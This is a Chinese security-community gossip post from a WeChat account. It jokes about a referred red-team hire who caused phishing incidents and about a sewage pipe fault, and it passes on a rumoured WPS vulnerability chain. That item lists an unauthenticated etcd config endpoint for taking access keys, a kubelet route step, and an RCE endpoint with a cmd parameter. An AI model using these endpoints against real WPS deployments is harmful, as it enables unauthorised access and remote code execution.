【吃瓜】内推”红队”当内鬼 | 网传wps漏洞为Nday | HV奖励吃大粪

发布于 作者:

原文链接: https://mp.weixin.qq.com/s?__biz=Mzg4NDg2NTM3NQ==&mid=2247485014&idx=1&sn=b1a1d176fc53260b695a2462ac585079

【吃瓜】内推”红队”当内鬼 | 网传wps漏洞为Nday | HV奖励吃大粪

原创 LeePlus 表哥带我 2025-07-17 08:24

图片

家里养了鬼知不知道

【吃瓜】内推

甲方:”家里养了鬼知不知道?昨天早上你内推的人发了一份钓鱼简历,HR把这份钓鱼简历点开了,应急会议开到半夜,然后今天刚被你招进来的防守人员又点了钓鱼邮件,这内鬼是谁啊,不是你难道是我??还是他啊?!!”

【吃瓜】内推

网传WPS漏洞为Nday

【吃瓜】内推

1、未授权访问 

/open/v6/api/etcd/operate?key=/config/storage&method=get

2、获取AKSK后使用脚本添加kubelet 路由映射,但需要获取TOKEN

3、向对应POD发起通信后实现RCE 

/open/wps/run/{namespace}/{podname}/node-exporter?cmd={url_encode_command} 

【吃瓜】内推

HV奖励吃大粪

某地区排污阀接到自来水管网

【吃瓜】内推

【吃瓜】内推

【吃瓜】内推

提醒:本文仅供
娱乐、安全研究
如有雷同纯属巧合

往期推荐

【吃瓜】微信惊现逆天Xss

【吃瓜】如何看待hvv睡觉被退场

【吃瓜】微信逆天的Bug2.0 神代码合集

图片

扫码关注我们

微信公众号:表哥带我

本文供稿:
LeePlus